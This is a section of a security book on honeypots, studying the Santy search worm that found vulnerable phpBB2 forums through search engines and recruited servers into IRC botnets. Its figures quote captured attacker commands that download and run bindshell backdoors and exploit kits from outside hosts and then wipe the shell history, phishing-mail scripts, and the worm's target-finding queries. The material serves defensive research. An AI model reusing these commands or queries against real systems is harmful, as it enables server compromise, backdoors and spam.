ch10lev1sec2.html

10.2. Search Worms

Another case where a specialized low-interaction honeypot proved extremely useful was in a year-long study of Search Worms conducted by one of the authors [69 ]. Before we describe how a low-interaction honeypot was used here, we explain what we consider to be search worms and why they are interesting.

As worms are becoming more virulent, there also have been many advances in operating systems trying to contain them. For example, Windows SP2 reduces the number of scanning connections a machine is allowed to open in parallel — effectively preventing randomly scanning worms from spreading. Recent research has also developed methods to create worm signatures quickly and to make random spreading much harder [14,101 ]. As a result, worm authors are looking for new ways to acquire vulnerable targets without relying on randomly scanning for them. It is often possible to find vulnerable web servers by sending carefully crafted queries to search engines. A vulnerability in a web server often allows remote execution of shell commands that can be leveraged by adversaries to gain complete control over the underlying host. The compromised host can then be used as a stepping stone to compromise more machines. Search worms automate this approach and spread by using popular search engines to find new attack vectors. Because these worms no longer need to randomly scan for targets, they evade any detection mechanism that assumes random scanning. In this case study, we use Santy as an example: Santy searches for web servers running a vulnerable version of phpBB2 and directly exploits them to run more worm instances that in turn search for more vulnerable servers [22].

One difficulty that search worms such as Santy must deal with is the fact that queries to search engines return only partial result sets. Instead of getting all possible results, the results are usually limited to include only the most important sites matching the query. This implies that search worms might get the same set of servers for each search query they attempt. To get more results, search worms change their queries by using different keywords, adding random numbers or walking deep into the result set. Nevertheless, due to the ranking inherent in the returned results, a search worm encounters many result collisions across subsequent queries that affect its propagation performance.

In general, a search worm executes the following sequence of operations:


1.	Generate search query. This step optimizes the search query to return as many unique targets as possible. Many Santy variants come with a list of prepared queries where each is responsible for a different set of results. For example, the queries might contain different version numbers of vulnerable software packages. Other ways to increase the performance of a search query are to increase the size of the returned results or to asking for results deeper in the result set.
2.	Analyze search results. In addition to the server addresses, search engines often return additional information that needs to be pruned such as small snippets of text or navigational links. Santy deals with this by parsing the returned HTML for URLs ignoring all URLs that belong to the search engine itself or do not meet the expected URL format. At this point, search worms might also prune duplicate results to make sure that each host name is exploited only once.
3.	Infect identified targets. Now that the search worm is in possession of potentially vulnerable target, the worm attempts to exploit them. Usually, this involves reformatting a URL to include exploit and bootstrapping code. Because the payload that can be delivered via the initial exploit is usually small, the bootstrap phase allows the search worm to download additional payloads, such as the worm binary itself, on the compromised target machine. The installation may happen in multiple steps and often relies on infrastructure already installed on the target. For example, variations of the Santy worm try to download themselves on the infected machine first via `wget`, `curl`, and then `fetch`. Santy variants usually also download additional applications such as bot binaries to join a bot network controlled by the adversary.

The Santy worm surfaced on December 20, 2004, and is the first search worm to propagate automatically without any human intervention [22 ]. It was written in Perl and exploited a bug in the phpBB bulletin system that allowed an adversary to run arbitrary code on the web server. To find vulnerable servers to infect, it used Google to search for URLs that contain the string viewtopic.php. To infect a web server, Santy appended an exploit against phpBB2 to each URL extracted from the search results. The exploit instructed the web server to download the Santy worm from a central distribution site. Once the worm had been started, it asked the search engine for more vulnerable sites. In addition to the worm itself, all variants also downloaded another payload connecting the infected machine to an IRC bot network.

Based on our knowledge about Santy, we were ready to install a customized honeypot to capture the worm and additional payloads such as bots and rootkits. The approach we took is similar to PHP.Hop described in Section 3.6 . Because Santy exploited a vulnerability in phpBB2's viewtopic.php handler, we installed a web server running a specially patched phpBB2 discussion forum. The patch simulated the vulnerability and returned fake output for a number of popular shell commands. In addition to faking the vulnerability, all attempts to download additional software onto the web server were logged and then executed in a safe environment. To protect the machine from any mistakes we might have made, the web server running the bulletin board was protected by Systrace; see Section 3.7.2.

However, before we could catch a real worm outbreak, we had to wait for search engines to index it our new forum pages. Fortunately, this did not take very long. In this context, it is usually helpful to run an already popular web server as it usually results in better ranking of the forum pages.

The initial botnets we observed were using a variant of Kaiten as an IRC client. We surreptitiously modified Kaiten to behave just as a normal bot but faked any DDoS or command execution capabilities. The average size of the botnets we joined was in the low thousands. Because bot networks are attractive and creating new Santy variants is easy, we have seen a large number of modifications to the original worm. Using the Santy versions captured on the honeypot, we have graphed the dependencies between different Santy variants in Figure 10.6 . Each node in the graph represents a different Santy variant written in Perl and is labeled using its filename on the infected web server. To give an overview about how the Santy worm evolved in time, we first connected each variant to the month and year in which it occurred, illustrated as the bar in the middle. Two variants are connected with an edge if their difference computed via diff is minimal in respect to all other variants. As Santy is written in Perl, the number of changed lines is a reasonable measure. Across all Santy variants that we collected, the average number of line changes is about 484. The minimum number of changes lines is one, and the maximum is 1689. The most common differences are changed search queries and distribution hosts. The graph shows that some variants of Santy have been continuously modified for over six months and that there are possibly many different adversaries launching new variants based on the disconnected components.

Figure 10.6. Based on the collection of all captured worm variants, we graphed the dependency between different Santy worms from August 2005 to May 2006. Each node in the graph is labeled by the filename downloaded to the infected host. An edge between two nodes indicates that the code differences are minimal compared to all other variants. A timeline shows how different variants have evolved over time.

[View full size image]

Figure 10.7 shows an overview of the different queries used by just one variant of Santy. We see that the worm uses random numbers to split the result sets. Remember, we mentioned earlier that different result sets allow the worm to spread more efficiently. We also notice that the worm is using queries specifically targeting the templates provided by phpBB2. For example, View previous topic and View next topic are navigational links in the forum.

Figure 10.7. The figure shows sample queries from a Santy outbreak in 2005.

GET /search?q="View+previous+topic+::+View+next+topic"+8756+ -modules&num=50&start=35 GET /search?q="vote+in+polls+in+this+forum"+7875+-modules& num=50&start=10 GET /search?q="reply+to+topics+in+this+forum"+5632+-modules& num=50&start=15 GET /search?q="Post+subject"+phpBB+6578+-modules&num=50& start=10 GET /search?q="delete+your+posts+in+this+forum"+9805+-modules& num=50&start=35 GET /search?q="post+new+topics+in+this+forum"+1906+-modules& num=100&start=30

When Santy initially appeared, we created an automated process for joining the botnets if we knew which bot variant was being used. We hoped to get some additional insight into the motivations behind these attacks, especially what the compromised servers were used for. One of the benefits of a compromised web server is that it is usually connected to the Internet with a high bandwidth pipe. So it was not surprising that a lot of the initial activity was focused on denial of service attacks. However, we also noticed that the attackers were installing backdoors on the compromised servers and tried to get root access as shown in Figure 10.8.

Figure 10.8. Santy bots are being used to install backdoors on compromised hosts.

#sdk :!FUTW SH cd /tmp/.bash_rc; wget http://org.tw/bindtty; \ chmod +x bindtty; ./bindtty; rm -fr bindtty; history -c; #sdk :!FUTW SH cd /tmp; wget http://org.tw/bindtty; \ chmod +x bindtty; ./bindtty; rm -fr bindtty; history -c; #sdk :!FUTW SH cd /tmp; wget http://org.tw/bindshell; \ history -c; #sdk :!FUTW SH cd /tmp; chmod 755 bindshell; ./bindshell; \ rm -f bindshell; history -c; #sdk :!FUTW SH cd /tmp; \ wget http://227.160.160.12/icons/small/small/xpl.tgz; \ tar xvzf xpl.tgz; cd kaz*; chmod +x kaz; .

Later on, we noticed that the activities were becoming more sophisticated. Instead of launching denial of service attacks, the adversaries were using the compromised web servers to send phishing e-mails. This looked like a fairly organized activity, as each web server received its own list of e-mail addresses to which to send the phishing message. An example is shown in Figure 10.9 . Although we could see that the botnets were being used for sending e-mail, we were not able to gain any insight into the economical side of the phishing operation. It would have been very useful to know how much money the adversaries in this example were being paid for providing a spam e-mail service.

Figure 10.9. Santy bots are being used for sending phishing e-mails.

#logitech :!GRATUEX SH wget host.com/xtnatz/msg.tgz; tar zxvf msg.tgz; \ rm -rf test.txt; wget host.com/consell/test.txt; php x.php . list.txt #logitech :!GRATUEX SH cd /var/tmp/....; php x.php . list.txt #logitech :!EITQAWUU SH cd /var/tmp/...; rm -rf list.txt; \ wget stud.usv.rr/~mihx/gamble.txt; ls #logitech :!EITQAWUU SH cd /var/tmp/...; mv gamble.txt list.txt; \ rm -rf test.txt; wget geocities.com/connexseller/test.txt; ls #logitech :!EITQAWUU SH cd /var/tmp/...; php x.php . list.txt

Another interesting development that illustrated the arms race between those who write search worms and those who defend against them was when the worm and the bot were combined into a single payload. This allowed the adversaries to update their search queries via IRC when they noticed that the current set of queries no longer worked. You can find many more details about how to defend against a search worm in the before-mentioned paper [69 ], but we hope that this example showed that even simple techniques provided by low-interaction honeypots such as PHP.Hop can yield very interesting results.